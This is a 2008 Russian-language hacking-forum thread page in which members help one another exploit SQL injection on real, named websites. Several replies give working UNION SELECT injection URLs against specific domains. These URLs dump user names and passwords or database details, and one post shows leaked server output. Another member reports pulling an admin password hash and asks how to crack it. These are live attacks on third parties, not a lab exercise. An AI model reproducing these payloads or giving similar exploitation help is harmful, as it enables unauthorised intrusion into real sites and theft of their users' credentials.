Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 160 of 1207
  1. zjuk@

    zjuk@ New Member

    Joined:
    4 Sep 2007
    Messages:
    13
    Likes Received:
    2
    Reputations:
    0
    Привет всем, в чём подвох?
    запрос:
    выдаёт "users"
    А запрос:
    Выдаёт "Table 'h_ksr.users' doesn't exist"
    Как такое может быть и как с этим бороться?
    Заранее спасибо
     
    #3181 zjuk@, 4 Sep 2008
    Last edited: 4 Sep 2008
  2. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    Там users лежит просто в другой БД, данные получать надо так:
    http://www.ksr.infoshare.ru/lib/?div=-1+union+select+concat_ws(0x3a,name,nik,pass)+from+aidsprintinfosha.users+limit+0,50--
     
    #3182 l-l00K, 4 Sep 2008
    Last edited: 4 Sep 2008
    2 people like this.
  3. zjuk@

    zjuk@ New Member

    Joined:
    4 Sep 2007
    Messages:
    13
    Likes Received:
    2
    Reputations:
    0
    Благодарю
     
    #3183 zjuk@, 4 Sep 2008
  4. Grema

    Grema Elder - Старейшина

    Joined:
    29 Nov 2005
    Messages:
    109
    Likes Received:
    16
    Reputations:
    -4
    Нашел скулю, выводило :Query failed: The used SELECT statements have a different number of columns

    Code:
    1 UNION SELECT 0x73716C696E6A666C6431,0x73716C696E6A666C6432,0x73716C696E6A666C6433,0x73716C696E6A666C6434,0x73716C696E6A666C6435,0x73716C696E6A666C6436,0x73716C696E6A666C6437,0x73716C696E6A666C6438,0x73716C696E6A666C6439,0x73716C696E6A666C643130,0x73716C696E6A666C643131,0x73716C696E6A666C643132,0x73716C696E6A666C643133,0x73716C696E6A666C643134,0x73716C696E6A666C643135,0x73716C696E6A666C643136,0x73716C696E6A666C643137,0x73716C696E6A666C643138,0x73716C696E6A666C643139,0x73716C696E6A666C643230,0x73716C696E6A666C643231,0x73716C696E6A666C643232,0x73716C696E6A666C643233,0x73716C696E6A666C643234,0x73716C696E6A666C643235,0x73716C696E6A666C643236,0x73716C696E6A666C643237,0x73716C696E6A666C643238,0x73716C696E6A666C643239,0x73716C696E6A666C643330,0x73716C696E6A666C643331,0x73716C696E6A666C643332,0x73716C696E6A666C643333,0x73716C696E6A666C643334,0x73716C696E6A666C643335,0x73716C696E6A666C643336,0x73716C696E6A666C643337,0x73716C696E6A666C643338,0x73716C696E6A666C643339,0x73716C696E6A666C643430,0x73716C696E6A666C643431,0x73716C696E6A666C643432,0x73716C696E6A666C643433,0x73716C696E6A666C643434,0x73716C696E6A666C643435,0x73716C696E6A666C643436,0x73716C696E6A666C643437,0x73716C696E6A666C643438,0x73716C696E6A666C643439,0x73716C696E6A666C643530,0x73716C696E6A666C643531,0x73716C696E6A666C643532,0x73716C696E6A666C643533,0x73716C696E6A666C643534,0x73716C696E6A666C643535,0x73716C696E6A666C643536,0x73716C696E6A666C643537,0x73716C696E6A666C643538,0x73716C696E6A666C643539,0x73716C696E6A666C643630,0x73716C696E6A666C643631,0x73716C696E6A666C643632,0x73716C696E6A666C643633,0x73716C696E6A666C643634,0x73716C696E6A666C643635,0x73716C696E6A666C643636,0x73716C696E6A666C643637,0x73716C696E6A666C643638,0x73716C696E6A666C643639,0x73716C696E6A666C643730,0x73716C696E6A666C643731,0x73716C696E6A666C643732,0x73716C696E6A666C643733,0x73716C696E6A666C643734,0x73716C696E6A666C643735,0x73716C696E6A666C643736,0x73716C696E6A666C643737,0x73716C696E6A666C643738,0x73716C696E6A666C643739,0x73716C696E6A666C643830,0x73716C696E6A666C643831,0x73716C696E6A666C643832,0x73716C696E6A666C643833/*
    перебрал до 54 вывело : not found in database

    и что делать? даже Version() не знаю, поля для вывода какбы нету, но если пишу from mysql.user то матюкаеться что нету прав.
    что делать?
     
    #3184 Grema, 4 Sep 2008
  5. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    ссылку бы
     
    #3185 DimOnOID, 4 Sep 2008
  6. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    сдепая скуля .. ассии тебе в руки ..
     
    #3186 159932, 4 Sep 2008
  7. none222

    none222 Guest

    Reputations:
    0
    2Grema
    попробуй с order by, group by
    и проверь на раскрытые скобки
     
    #3187 none222, 5 Sep 2008
  8. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    че с этой мутью делать? как её перекодировать?
    вывел с помощью mysql-inj:
    Љ�гЊя
     
    #3188 AFoST, 5 Sep 2008
  9. none222

    none222 Guest

    Reputations:
    0
    возможно это "свой" метод шифрования. Тебе бы не помешало посмотреть сорцы.
    самый протсой метод шифрования - это:

    1 беррётся Ascii код символа и к мне му прибавляется\отнимается\какое-то чисто. В итоге получается такая вот муть =)
     
    #3189 none222, 5 Sep 2008
    1 person likes this.
  10. none222

    none222 Guest

    Reputations:
    0
    ничего и не получится - там параметр в ковычках, а ковычки экранизируются слешем
     
    #3190 none222, 5 Sep 2008
  11. tor4)

    tor4) Elder - Старейшина

    Joined:
    27 May 2008
    Messages:
    45
    Likes Received:
    21
    Reputations:
    -6
    Возможно ли провести иньекцию.
    http://www.karjeroscentras.lt/lt.php/ieskantiems_darbo/darbo_skelbimai/darbo_skelbimai/347;f_ctitle;UAB%20%22Aidma%27%22

    нашол ошибки а за юзать не выходит.
     
    #3191 tor4), 5 Sep 2008
  12. paulzey

    paulzey Elder - Старейшина

    Joined:
    30 Oct 2007
    Messages:
    52
    Likes Received:
    16
    Reputations:
    5
    Возможно! (Чуть не написал "легко", нифига не так просто. :))
    Code:
    http://www.karjeroscentras.lt/lt.php/ieskantiems_darbo/darbo_skelbimai/darbo_skelbimai/347;f_ctitle;123'%20and%201=2%20union%20select%201,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8%23
    [email protected]:4.0.18:karjeroscentras

    Можно пытаться раскручивать дальше. Иньекция не слепая, показывает запрос и количество полей, короче, время провёл не зря. (Даже не подозревал, что так могу. :))
    Если отдельные моменты будут непонятны - могу расписать, правда, не факт, что появлюсь тут до понедельника.

    В любом случае, большое спасибо за увлекательную задачу. :)
     
    #3192 paulzey, 5 Sep 2008
    2 people like this.
  13. none222

    none222 Guest

    Reputations:
    0
    вытянул пароль из таблицы admin
    711de2ca756942dc
    что за шифрование не подскажете? не мускульная ль функция?
     
    #3193 none222, 5 Sep 2008
  14. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    749
    Likes Received:
    244
    Reputations:
    22
    o3,14um похоже это обычный mysql
     
    #3194 Doom123, 5 Sep 2008
  15. none222

    none222 Guest

    Reputations:
    0
    да, так оно и есть, 100% мускульная функция пасвод
     
    #3195 none222, 5 Sep 2008
  16. .Striker

    .Striker Elder - Старейшина

    Joined:
    11 Nov 2007
    Messages:
    82
    Likes Received:
    63
    Reputations:
    -4
    помогите расскрутить скулю, я не шарю
    домен пр5
    http://web.ffos.hr/serv_file.php?file=-44'
     
    #3196 .Striker, 5 Sep 2008
  17. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    http://web.ffos.hr/serv_file.php?file=-44+union+select+1,2,concat_ws(0x40,version(),user(),database()),4,5,6,7,8/*
    вывод 3и4....4-название файла..3 внутри файла...
     
    #3197 DimOnOID, 5 Sep 2008
    Last edited: 5 Sep 2008
    2 people like this.
  18. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    Ну вот. Приехал :D ... Не пойму в чем ошибка:
    Составляю: http://site.ru/?cat=103&id=1/**/order/**/by/**/100/*
    Вылазит:
    Code:
    MySQL Error...
SQL Query: select * from fotocatalog where m_id = '0' and status != 'del' and p_id = '1/**/order/**/by/**/100/*' order by date desc limit -2575, 25
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-2575, 25' at line 1
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/***/***/***.ru/test.php on line 84
    Перепробовал уже и /**/ и + и %20 , все одно и тоже вылазит. Также пробовал and и другие - в результате 0...

    *призадумался :confused: :confused: :confused:
     
    #3198 USAkid, 6 Sep 2008
  19. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    2usakid параметр предыдуший ковычкой закрой у тебя запрос просто кривоватый получаеться ! ;)
     
    #3199 MaSTeR GэN, 6 Sep 2008
    Last edited: 6 Sep 2008
    1 person likes this.
  20. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    749
    Likes Received:
    244
    Reputations:
    22
    USAkid

    http://site.ru/?cat=103&id=1'/**/order/**/by/**/100/*
     
    #3200 Doom123, 6 Sep 2008
(You must log in or sign up to post here.)
Page 160 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.